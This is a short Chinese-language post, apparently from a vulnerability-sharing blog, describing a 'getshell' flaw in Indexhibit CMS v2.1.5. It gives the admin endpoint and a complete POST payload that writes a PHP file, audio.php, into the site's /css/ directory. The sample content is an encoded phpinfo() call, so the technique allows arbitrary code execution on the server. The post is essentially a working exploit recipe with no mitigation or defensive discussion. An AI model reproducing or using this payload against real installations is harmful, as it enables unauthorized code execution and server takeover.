Indexhibit_cms_v2.1.5_編輯php文件getshell漏洞

# Indexhibit cms v2.1.5 編輯php文件getshell漏洞
==漏洞利用==
當我們登錄進後台後,向/ndxzstudio/?a=system
post數據:

upd_jxcode=true&v=%253C%253Fphp%2520phpinfo()%253B%253F%253E&id=%2Fcss%2Faudio.php

即可在/css/目錄寫入一個php文件audio.php。

成功getshell

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容